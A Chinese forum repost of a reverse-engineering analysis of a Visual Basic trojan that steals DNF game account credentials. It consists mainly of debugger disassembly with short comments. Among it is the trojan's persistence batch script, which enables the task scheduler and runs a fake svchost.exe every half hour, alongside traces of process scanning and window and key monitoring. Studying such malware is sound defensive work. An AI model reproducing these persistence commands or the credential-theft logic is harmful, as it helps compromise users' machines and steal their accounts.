收藏本站 GP點獲取方式 轉帖工具
開啟輔助瀏覽 切換到寬版
搜尋

手機遊戲


線上遊戲


其他



脱壳文章

返回清單
切換到指定樓層
通知這文章過時或找檔案 發表主題

[VB] 【轉貼】線上遊戲DNF盜帳密木馬-分析源碼

[複製連結]
1
SheepKingCN ( Lv.80 論壇達人 ) 發表於 2013-8-31 15:12:30 | 只看該作者 回覆獎勵 |降序瀏覽 |閱讀模式
此為本人學習、無聊研究用,為了要備份文章,所以才發在這裡。

作者: 中國大陸-当红小生
  1. 7339EDA9 . 50 push eax ; /pVersionInformation
  2. 7339EDAA . 33FF xor edi,edi ; |
  3. 7339EDAC . C785 54FFFFFF>mov dword ptr ss:[ebp-AC],94 ; |
  4. 7339EDB6 . FF15 CC103973 call dword ptr ds:[<&KERNEL32.GetVersion>; \GetVersionExA
  5. 7339EDBC . 33C0 xor eax,eax
  6. ......
  7. 7339EE1F . 8D85 68FFFFFF lea eax,dword ptr ss:[ebp-98]
  8. 7339EE25 . 68 589F3A73 push msvbvm60.733A9F58 ; Service pack
  9. 7339EE2A . 50 push eax

  11. 00406882 FF50 04 call dword ptr ds:[eax+4] ; msvbvm60.Zombie_AddRef
  12. 00406885 C745 FC 0100000>mov dword ptr ss:[ebp-4],1
  13. 0040688C C745 FC 0200000>mov dword ptr ss:[ebp-4],2
  14. 00406893 E8 48960000 call 脱壳后.0040FEE0 ; F7进去是获取目录
  15. 00406898 C745 FC 0300000>mov dword ptr ss:[ebp-4],3
  16. 0040689F 6A FF push -1 ; /OnErrEvent = Resume Next
  17. 004068A1 FF15 78F04100 call dword ptr ds:[<&msvbvm60.__vbaOnErr>; msvbvm60.__vbaOnError
  18. 004068A7 C745 FC 0400000>mov dword ptr ss:[ebp-4],4
  19. 004068AE 8B15 48504100 mov edx,dword ptr ds:[415048] ; (UNICODE "C:\WINDOWS\system32")
  20. 004068B4 52 push edx
  21. 004068B5 68 88324000 push 脱壳后.00403288 ; \Pusmint
  22. 004068BA FF15 48F04100 call dword ptr ds:[<&msvbvm60.__vbaStrCa>; msvbvm60.__vbaStrCat
  23. 004068C0 8BD0 mov edx,eax ; "C:\WINDOWS\system32\Pusmint")
  24. 004068C2 8D4D DC lea ecx,dword ptr ss:[ebp-24]
  25. 004068C5 FF15 F4F14100 call dword ptr ds:[<&msvbvm60.__vbaStrMo>; msvbvm60.__vbaStrMove
  26. 004068CB 50 push eax ; (UNICODE "C:\WINDOWS\system32\Pusmint")
  27. 004068CC FF15 40F14100 call dword ptr ds:[<&msvbvm60.rtcMakeDir>; F7
  28. 004068D2 8D4D DC lea ecx,dword ptr ss:[ebp-24] ; 创建目录
  29. 004068D5 FF15 18F24100 call dword ptr ds:[<&msvbvm60.__vbaFreeS>; msvbvm60.__vbaFreeStr
  30. 004068DB C745 FC 0500000>mov dword ptr ss:[ebp-4],5
  31. 004068E2 A1 48504100 mov eax,dword ptr ds:[415048]
  32. 004068E7 50 push eax
  33. 004068E8 68 B4324000 push 脱壳后.004032B4 ; \Pusmint\svchost.exe
  34. 004068ED FF15 48F04100 call dword ptr ds:[<&msvbvm60.__vbaStrCa>; msvbvm60.__vbaStrCat
  35. 004068F3 8BD0 mov edx,eax
  36. 004068F5 8D4D DC lea ecx,dword ptr ss:[ebp-24]
  37. 004068F8 FF15 F4F14100 call dword ptr ds:[<&msvbvm60.__vbaStrMo>; msvbvm60.__vbaStrMove

  39. 00406B9E FF15 70F14100 call dword ptr ds:[<&msvbvm60.rtcDir>] ; msvbvm60.rtcDir
  40. 00406BA4 8BD0 mov edx,eax ; (UNICODE "svchost.exe")
  41. 00406BA6 8D4D E0 lea ecx,dword ptr ss:[ebp-20]
  42. 00406BA9 FFD7 call edi ; (msvbvm60.__vbaStrMove)
  43. 00406BAB 50 push eax
  44. 00406BAC 68 3C334000 push 脱壳后.0040333C
  45. 00406BB1 FF15 BCF04100 call dword ptr ds:[<&msvbvm60.__vbaStr>; msvbvm60.__vbaStrCmp
  46. 00406BB7 8BF0 mov esi,eax
  47. 00406BB9 8D4D E0 lea ecx,dword ptr ss:[ebp-20]
  48. 00406BBC F7DE neg esi
  49. 00406BBE 1BF6 sbb esi,esi
  50. 00406BC0 46 inc esi
  51. 00406BC1 F7DE neg esi
  52. 00406BC3 FF15 18F24100 call dword ptr ds:[<&msvbvm60.__vbaFre>; msvbvm60.__vbaFreeStr

  54. 733BD096 . 51 push ecx ; /pLocalFileTime
  55. 733BD097 . 50 push eax ; |pFileTime
  56. 733BD098 . FF15 F0103973 call dword ptr ds:[<&KERNEL32.FileTime>; \FileTimeToLocalFileTime
  57. 733BD09E . 85C0 test eax,eax
  58. 733BD0A0 . 0F84 09B10100 je msvbvm60.733D81AF
  59. 733BD0A6 . 8D5424 08 lea edx,dword ptr ss:[esp+8]
  60. 733BD0AA . 8D4424 00 lea eax,dword ptr ss:[esp]
  61. 733BD0AE . 52 push edx ; /pSystemTime
  62. 733BD0AF . 50 push eax ; |pFileTime
  63. 733BD0B0 . FF15 F4103973 call dword ptr ds:[<&KERNEL32.FileTime>; \FileTimeToSystemTime

  65. 0041005C 8B35 A0F14100 mov esi,dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaStrCopy
  66. 00410062 33FF xor edi,edi
  67. 00410064 8D4D D4 lea ecx,dword ptr ss:[ebp-2C]
  68. 00410067 897D EC mov dword ptr ss:[ebp-14],edi
  69. 0041006A 897D DC mov dword ptr ss:[ebp-24],edi
  70. 0041006D 897D D8 mov dword ptr ss:[ebp-28],edi
  71. 00410070 897D D4 mov dword ptr ss:[ebp-2C],edi
  72. 00410073 FFD6 call esi ; <&msvbvm60.__vbaStrCopy>
  73. 00410075 8B55 10 mov edx,dword ptr ss:[ebp+10]
  74. 00410078 8D4D EC lea ecx,dword ptr ss:[ebp-14]
  75. 0041007B FFD6 call esi ; (msvbvm60.__vbaStrCopy)
  76. 0041007D 8B45 D4 mov eax,dword ptr ss:[ebp-2C] ; "C:\Documents and Settings\Administrator\")
  77. 00410080 8B35 7CF14100 mov esi,dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaFileOpen
  78. 00410086 50 push eax
  79. 00410087 6A 01 push 1
  80. 00410089 6A FF push -1
  81. 0041008B 68 20010000 push 120
  82. 00410090 FFD6 call esi ; <&msvbvm60.__vbaFileOpen>
  83. 00410092 57 push edi
  84. 00410093 6A 01 push 1
  85. 00410095 FF15 88F14100 call dword ptr ds:[<&msvbvm60.rtcFileL>; msvbvm60.rtcFileLength
  86. 0041009B 8B3D F8F04100 mov edi,dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaRedim
  87. 004100A1 50 push eax
  88. 004100A2 6A 01 push 1
  89. 004100A4 8D4D D8 lea ecx,dword ptr ss:[ebp-28]
  90. 004100A7 6A 11 push 11
  91. 004100A9 51 push ecx
  92. 004100AA 6A 01 push 1
  93. 004100AC 68 80000000 push 80
  94. 004100B1 FFD7 call edi ; (msvbvm60.__vbaRedim)
  95. 004100B3 83C4 1C add esp,1C
  96. 004100B6 8D55 D8 lea edx,dword ptr ss:[ebp-28]
  97. 004100B9 6A 01 push 1
  98. 004100BB 52 push edx
  99. 004100BC 68 244A4000 push 脱壳后.00404A24
  100. 004100C1 FF15 50F14100 call dword ptr ds:[<&msvbvm60.__vbaGet>; msvbvm60.__vbaGetOwner3
  101. 004100C7 8B1D A4F04100 mov ebx,dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaFileClose
  102. 004100CD 6A 01 push 1
  103. 004100CF FFD3 call ebx ; <&msvbvm60.__vbaFileClose>
  104. 004100D1 8B45 EC mov eax,dword ptr ss:[ebp-14]
  105. 004100D4 50 push eax
  106. 004100D5 6A 02 push 2
  107. 004100D7 6A FF push -1
  108. 004100D9 6A 20 push 20 ; 看函数名就知道有动作了。。。
  109. 004100DB FFD6 call esi ; (msvbvm60.__vbaFileOpen)

  111. 00407281 C745 FC 0900000>mov dword ptr ss:[ebp-4],9
  112. 00407288 6A FF push -1
  113. 0040728A FF15 78F04100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaOnError
  114. 00407290 C745 FC 0A00000>mov dword ptr ss:[ebp-4],0A
  115. 00407297 8B0D 48504100 mov ecx,dword ptr ds:[415048]
  116. 0040729D 51 push ecx
  117. 0040729E 68 F8364000 push 脱壳后.004036F8 ; \Pusmint\SystemDir.bat 东西还真不少
  118. 004072A3 FF15 48F04100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaStrCat
  119. 004072A9 8BD0 mov edx,eax
  120. 004072AB 8D4D C0 lea ecx,dword ptr ss:[ebp-40]
  121. 004072AE FF15 F4F14100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaStrMove
  122. 004072B4 50 push eax
  123. 004072B5 6A 01 push 1
  124. 004072B7 6A FF push -1
  125. 004072B9 6A 02 push 2
  126. 004072BB FF15 7CF14100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaFileOpen
  127. 004072C1 8D4D C0 lea ecx,dword ptr ss:[ebp-40]
  128. 004072C4 FF15 18F24100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaFreeStr
  129. {
  130. sc config Schedule start= AUTO
  131. net start schedule
  132. AT 0:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  133. AT 1:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  134. AT 2:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  135. AT 3:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  136. AT 4:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  137. AT 5:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  138. AT 6:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  139. AT 7:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  140. AT 8:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  141. AT 9:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  142. AT 10:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  143. AT 11:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  144. AT 12:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  145. AT 13:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  146. AT 14:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  147. AT 15:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  148. AT 16:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  149. AT 17:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  150. AT 18:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  151. AT 19:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  152. AT 20:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  153. AT 21:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  154. AT 22:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  155. AT 23:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  156. AT 0:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  157. AT 1:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  158. AT 2:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  159. AT 3:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  160. AT 4:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  161. AT 5:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  162. AT 6:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  163. AT 7:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  164. AT 8:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  165. AT 9:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  166. AT 10:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  167. AT 11:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  168. AT 12:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  169. AT 13:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  170. AT 14:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  171. AT 15:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  172. AT 16:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  173. AT 17:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  174. AT 18:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  175. AT 19:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  176. AT 20:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  177. AT 21:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  178. AT 22:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  179. AT 23:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  180. }
複製代碼
我是分隔線

  2. 00402F43 00 db 00
  3. 00402F44 $ A1 FC564100 mov eax,dword ptr ds:[4156FC]
  4. 00402F49 . 0BC0 or eax,eax
  5. 00402F4B . 74 02 je short svchost.00402F4F
  6. 00402F4D . FFE0 jmp eax
  7. 00402F4F > 68 2C2F4000 push svchost.00402F2C ; FindWindowA
  8. 00402F54 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
  9. 00402F59 . FFD0 call eax
  10. 00402F5B . FFE0 jmp eax ; user32.FindWindowA
  11. 00402F5D 00 db 00
  12. 00402F5E 00 db 00

  14. 00403034   [        DISCUZ_CODE_4        ]nbsp; A1 20574100   mov eax,dword ptr ds:[415720]
  15. 00403039   .  0BC0          or eax,eax
  16. 0040303B   .  74 02         je short svchost.0040303F
  17. 0040303D   .  FFE0          jmp eax
  18. 0040303F   >  68 1C304000   push svchost.0040301C                    ;  user32
  19. 00403044   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
  20. 00403049   .  FFD0          call eax
  21. 0040304B   .  FFE0          jmp eax                                  ;  SendMessageA

  23. 0040307C   [        DISCUZ_CODE_4        ]nbsp; A1 2C574100   mov eax,dword ptr ds:[41572C]
  24. 00403081   .  0BC0          or eax,eax
  25. 00403083   .  74 02         je short svchost.00403087
  26. 00403085   .  FFE0          jmp eax
  27. 00403087   >  68 64304000   push svchost.00403064                    ;  
  28. 0040308C   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
  29. 00403091   .  FFD0          call eax
  30. 00403093   .  FFE0          jmp eax                                  ;  RtlMoveMemory

  32. 00403114   [        DISCUZ_CODE_4        ]nbsp; A1 44574100   mov eax,dword ptr ds:[415744]
  33. 00403119   .  0BC0          or eax,eax
  34. 0040311B   .  74 02         je short svchost.0040311F
  35. 0040311D   .  FFE0          jmp eax
  36. 0040311F   >  68 FC304000   push svchost.004030FC               ;  
  37. 00403124   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionC>
  38. 00403129   .  FFD0          call eax
  39. 0040312B   .  FFE0          jmp eax                             ;  GetForegroundWindow

  41. 0040315C   [        DISCUZ_CODE_4        ]nbsp; A1 50574100   mov eax,dword ptr ds:[415750]
  42. 00403161   .  0BC0          or eax,eax
  43. 00403163   .  74 02         je short svchost.00403167
  44. 00403165   .  FFE0          jmp eax
  45. 00403167   >  68 44314000   push svchost.00403144               ;  user32
  46. 0040316C   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionC>
  47. 00403171   .  FFD0          call eax
  48. 00403173   .  FFE0          jmp eax                             ;  GetWindowTextA


  51. 0040501F   > \68 FC4F4000   push svchost.00404FFC                    ;  GetClassNameA
  52. 00405024   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
  53. 00405029   .  FFD0          call eax
  54. 0040502B   .  FFE0          jmp eax                                  ;  GetClassNameA


  57. 0040349C $ A1 A4574100 mov eax,dword ptr ds:[4157A4]
  58. 004034A1 . 0BC0 or eax,eax
  59. 004034A3 . 74 02 je short svchost.004034A7
  60. 004034A5 . FFE0 jmp eax
  61. 004034A7 > 68 84344000 push svchost.00403484 ; RegisterWindowMessageA
  62. 004034AC . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
  63. 004034B1 . FFD0 call eax
  64. 004034B3 . FFE0 jmp eax

  66. 0040344C $ A1 98574100 mov eax,dword ptr ds:[415798]
  67. 00403451 . 0BC0 or eax,eax
  68. 00403453 . 74 02 je short svchost.00403457
  69. 00403455 . FFE0 jmp eax
  70. 00403457 > 68 34344000 push svchost.00403434 ; RegisterShellHookWindow
  71. 0040345C . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunction>
  72. 00403461 . FFD0 call eax
  73. 00403463 . FFE0 jmp eax

  75. 00403543 > \68 20354000 push svchost.00403520 ; SetWindowLongA
  76. 00403548 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctio>
  77. 0040354D . FFD0 call eax
  78. 0040354F .- FFE0 jmp eax ; user32.SetWindowLongA

  80. 00402EA4 $ A1 F0564100 mov eax,dword ptr ds:[4156F0]
  81. 00402EA9 . 0BC0 or eax,eax
  82. 00402EAB . 74 02 je short svchost.00402EAF
  83. 00402EAD . FFE0 jmp eax
  84. 00402EAF > 68 8C2E4000 push svchost.00402E8C ; GetWindowThreadProcessId

  86. 00402EB4 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctio>
  87. 00402EB9 . FFD0 call eax
  88. 00402EBB .- FFE0 jmp eax ; user32.GetWindowThreadProcessId

  90. 00411639 . 6A 03 push 3 ; /varType = Long
  91. 0041163B . 8D45 C8 lea eax,dword ptr ss:[ebp-38] ; |
  92. 0041163E . 33FF xor edi,edi ; |
  93. 00411640 . 68 005B4000 push svchost.00405B00 ; |ArraySturctdes = svchost.00405B00
  94. 00411645 . 50 push eax ; |ArrayVar
  95. 00411646 . 897D E0 mov dword ptr ss:[ebp-20],edi ; |
  96. 00411649 . 897D BC mov dword ptr ss:[ebp-44],edi ; |
  97. 0041164C . 897D B8 mov dword ptr ss:[ebp-48],edi ; |
  98. 0041164F . 897D A8 mov dword ptr ss:[ebp-58],edi ; |
  99. 00411652 . 897D A4 mov dword ptr ss:[ebp-5C],edi ; |
  100. 00411655 . FF15 CCF04100 call dword ptr ds:[<&msvbvm60.__v>; \__vbaAryConstruct2
  101. 0041165B . 8B4D 08 mov ecx,dword ptr ss:[ebp+8]
  102. 0041165E . 51 push ecx
  103. 0041165F . 57 push edi
  104. 00411660 . 68 10040000 push 410
  105. 00411665 . E8 361BFFFF call svchost.004031A0 ; 打开进程
  106. {
  107. 004031A0 $ A1 5C574100 mov eax,dword ptr ds:[41575C]
  108. 004031A5 . 0BC0 or eax,eax
  109. 004031A7 . 74 02 je short svchost.004031AB
  110. 004031A9 . FFE0 jmp eax
  111. 004031AB > 68 88314000 push svchost.00403188 ; OpenProcess
  112. 004031B0 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctio>
  113. 004031B5 . FFD0 call eax
  114. 004031B7 .- FFE0 jmp eax ; kernel32.OpenProcess
  115. }
  116. 0041166A . 8B35 50F04100 mov esi,dword ptr ds:[<&msvbvm60.>; msvbvm60.__vbaSetSystemError
  117. 00411670 . 8945 A4 mov dword ptr ss:[ebp-5C],eax
  118. 00411673 . FFD6 call esi ; <&msvbvm60.__vbaSetSystemError>

  120. 004116A8 . FF15 A8F04100 call dword ptr ds:[<&msvbvm60.rtc>; msvbvm60.rtcSpaceVar
  121. 004116AE . 8D45 A8 lea eax,dword ptr ss:[ebp-58]
  122. 004116B1 . 50 push eax
  123. 004116B2 . FF15 18F04100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrVarMove
  124. 004116B8 . 8BD0 mov edx,eax
  125. 004116BA . 8D4D BC lea ecx,dword ptr ss:[ebp-44]
  126. 004116BD . FF15 F4F14100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrMove
  127. 004116C3 . 8D4D A8 lea ecx,dword ptr ss:[ebp-58]
  128. 004116C6 . FF15 10F04100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaFreeVar
  129. 004116CC . 8B4D BC mov ecx,dword ptr ss:[ebp-44]
  130. 004116CF . 68 F4010000 push 1F4
  131. 004116D4 . 8D55 B8 lea edx,dword ptr ss:[ebp-48]
  132. 004116D7 . 51 push ecx
  133. 004116D8 . 52 push edx
  134. 004116D9 . FF15 D8F14100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrToAnsi


  137. 00404B28 $ A1 F8574100 mov eax,dword ptr ds:[4157F8]
  138. 00404B2D . 0BC0 or eax,eax
  139. 00404B2F . 74 02 je short svchost.00404B33
  140. 00404B31 . FFE0 jmp eax
  141. 00404B7F   > \68 5C4B4000   push svchost.00404B5C                    ;  EnumProcessModules
  142. 00404B84   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
  143. 00404B89   .  FFD0          call eax
  144. 00404B8B   .  FFE0          jmp eax                                  ;  EnumProcessModules


  147. 004116F9 . FF15 20F14100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrToUnicode
  148. 004116FF . 8D4D B8 lea ecx,dword ptr ss:[ebp-48]
  149. 00411702 . FF15 18F24100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaFreeStr
  150. 00411708 . 8B55 BC mov edx,dword ptr ss:[ebp-44]
  151. 0041170B . 8D4D E0 lea ecx,dword ptr ss:[ebp-20]
  152. 0041170E . FF15 A0F14100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrCopy

  154. 00403230 $ A1 74574100 mov eax,dword ptr ds:[415774]
  155. 00403235 . 0BC0 or eax,eax
  156. 00403237 . 74 02 je short svchost.0040323B
  157. 00403239 . FFE0 jmp eax
  158. 0040323B > 68 18324000 push svchost.00403218 ; CloseHandle
  159. 00403240 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunction>
  160. 00403245 . FFD0 call eax
  161. 00403247 . FFE0 jmp eax

  163. 0040C2BC . FF15 B8F04100 call dword ptr ds:[<&msvbvm60.rt>; msvbvm60.rtcUpperCaseVar
  164. 0040C2C2 . 6A 00 push 0
  165. 0040C2C4 . 6A FF push -1
  166. 0040C2C6 . 6A 01 push 1
  167. 0040C2C8 . 68 BC4B4000 push svchost.00404BBC ; UserSetting.ini
  168. 0040C2CD . 68 A04B4000 push svchost.00404BA0 ; QQLOGIN.EXE
  169. 0040C2D2 . 8D45 B8 lea eax,dword ptr ss:[ebp-48]
  170. 0040C2D5 . 50 push eax ; /String8
  171. 0040C2D6 . 8D4D D0 lea ecx,dword ptr ss:[ebp-30] ; |
  172. 0040C2D9 . 51 push ecx ; |ARG2 = 0012FB48
  173. 0040C2DA . FF15 54F14100 call dword ptr ds:[<&msvbvm60.__>; \__vbaStrVarVal

  175. 0040C322 . FF15 B8F04100 call dword ptr ds:[<&msvbvm60.rt>; msvbvm60.rtcUpperCaseVar
  176. 0040C328 . 6A 00 push 0
  177. 0040C32A . 6A FF push -1
  178. 0040C32C . 6A 01 push 1
  179. 0040C32E . 68 E04B4000 push svchost.00404BE0 ; config\Info.ini
  180. 0040C333 . 68 A04B4000 push svchost.00404BA0 ; QQLOGIN.EXE
  181. 0040C338 . 8D55 B8 lea edx,dword ptr ss:[ebp-48]
  182. 0040C33B . 52 push edx ; /String8
  183. 0040C33C . 8D45 D0 lea eax,dword ptr ss:[ebp-30] ; |
  184. 0040C33F . 50 push eax ; |ARG2
  185. 0040C340 . FF15 54F14100 call dword ptr ds:[<&msvbvm60.__>; \__vbaStrVarVal


  188. 0040C673 . BA 044C4000 mov edx,svchost.00404C04 ; dnf.exe
  189. 0040C678 . 8D4D CC lea ecx,dword ptr ss:[ebp-34]
  190. 0040C67B . FF15 A0F14100 call dword ptr ds:[<&msvbvm60.__vbaStrCo>; msvbvm60.__vbaStrCopy
  191. 0040C681 . 8D55 CC lea edx,dword ptr ss:[ebp-34]

  193. 00404C6F > \68 4C4C4000 push svchost.00404C4C ; CreateToolhelp32Snapshot
  194. 00404C74 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCal>
  195. 00404C79 . FFD0 call eax
  196. 00404C7B .- FFE0 jmp eax ; kernel32.CreateToolhelp32Snapshot

  198. 00404CD3 > \68 B04C4000 push svchost.00404CB0 ; Process32First
  199. 00404CD8 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
  200. 00404CDD . FFD0 call eax
  201. 00404CDF . FFE0 jmp eax ; Process32First

  203. 00404D1B > \68 F84C4000 push svchost.00404CF8 ; Process32Next
  204. 00404D20 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
  205. 00404D25 . FFD0 call eax
  206. 00404D27 .- FFE0 jmp eax ; kernel32.Process32Next

  208. 0040C685 . E8 064C0000 call svchost.00411290 ; 创建快照
  209. 0040C68A . 8945 D8 mov dword ptr ss:[ebp-28],eax
  210. 0040C68D . 8D4D CC lea ecx,dword ptr ss:[ebp-34]
  211. 0040C690 . FF15 18F24100 call dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaFreeStr
  212. 0040C696 . C745 FC 03000>mov dword ptr ss:[ebp-4],3
  213. 0040C69D . 837D D8 00 cmp dword ptr ss:[ebp-28],0
  214. 0040C6A1 . 0F84 62240000 je svchost.0040EB09 这个是判断是否有DNF.exe
  215. 0040C6A7 . C745 FC 04000>mov dword ptr ss:[ebp-4],4


  218. 004034FB > \68 D8344000 push svchost.004034D8 ; DeregisterShellHookWindow
  219. 00403500 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
  220. 00403505 . FFD0 call eax
  221. 00403507 . FFE0 jmp eax


  224. 733A03F6    BB B8A63A73     mov ebx,msvbvm60.733AA6B8             ; ThunderRT6Main   
  225. 733A03FB    50              push eax
  226. 733A03FC    53              push ebx
  227. 733A03FD    FF35 D0064A73   push dword ptr ds:[734A06D0]          ; msvbvm60.73390000
  228. 733A0403    FF15 F8123973   call dword ptr ds:[<&USER32.GetClassI>; user32.GetClassInfoExA
  229. 733A0409    33F6            xor esi,esi
  230. 733A040B    85C0            test eax,eax
  231. 733A040D    75 71           jnz short msvbvm60.733A0480
  232. 733A040F    6A 0C           push 0C
  233. 733A0411    8D7D CC         lea edi,dword ptr ss:[ebp-34]
  234. 733A0414    59              pop ecx
  235. 733A0415    6A 01           push 1
  236. 733A0417    FF35 D4064A73   push dword ptr ds:[734A06D4]          ; svchost.00400000

  238. 733A130E . BF 10A93A73 mov edi,msvbvm60.733AA910 ; ASCII "VBMsoStdCompMgr"
  239. 733A1313 . 68 55133A73 push msvbvm60.733A1355
  240. 733A1318 . 57 push edi
  241. 733A1319 . E8 7DDEFFFF call msvbvm60.7339F19B

  243. 004035D0   [        DISCUZ_CODE_4        ]nbsp; A1 D4574100   mov eax,dword ptr ds:[4157D4]
  244. 004035D5   .  0BC0          or eax,eax
  245. 004035D7   .  74 02         je short svchost.004035DB
  246. 004035D9   .  FFE0          jmp eax
  247. 004035DB   >  68 B8354000   push svchost.004035B8                    ;  user32
  248. 004035E0   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
  249. 004035E5   .  FFD0          call eax
  250. 004035E7   .  FFE0          jmp eax                                  ;  GetWindowTextLengthW

  252. 0040364D   .  0BC0          or eax,eax
  253. 0040364F   .  74 02         je short svchost.00403653
  254. 00403651   .  FFE0          jmp eax
  255. 00403653   >  68 30364000   push svchost.00403630                    ;  user32
  256. 00403658   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
  257. 0040365D   .  FFD0          call eax
  258. 0040365F   .  FFE0          jmp eax                                  ;  GetKeyState

  260. 00403690   [        DISCUZ_CODE_4        ]nbsp; A1 EC574100   mov eax,dword ptr ds:[4157EC]
